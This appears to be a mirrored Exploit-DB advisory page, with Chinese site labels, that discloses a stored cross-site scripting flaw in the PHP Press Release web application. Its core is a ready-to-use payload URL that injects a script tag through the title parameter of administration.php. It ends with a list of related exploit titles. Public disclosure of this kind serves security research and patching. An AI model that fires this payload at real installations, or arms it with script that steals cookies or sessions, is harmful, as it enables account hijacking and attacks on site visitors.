PHP Press Release – Persistent Cross-Site Scripting

Exploit Database
132 阅读

作者： Besim

日期： 2016-10-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40487/

# Exploit Title :PHP Press Release* - Stored Cross Site

Scripting*

# Author : Besim

# Google Dork : -

# Date : 09/10/2016

# Type : webapps

# Platform : PHP

# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1

# Software link :

http://www.pagereactions.com/downloads/phppressrelease.zip

Description :

Vulnerable link :

http://site_name/phppressrelease/administration.php?pageaction=newrelease

Stored XSS Payload :

http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active

last Exploits
PHP Press Release – Persistent Cross-Site Scripting的更多信息

Article Friendly – Cross-Site Request Forgery：
jCart 1.1 – Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities：
Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)：
Premium Penny Auction Script – SQL Injection：
EPESI 1.8.2 rev20170830 – Cross-Site Scripting：
SuperStoreFinder – Multiple Vulnerabilities：
WordPress Plugin 3dady real-time web stats 1.0 – Stored Cross Site Scripting (XSS)：
DO-CMS – Multiple SQL Injections：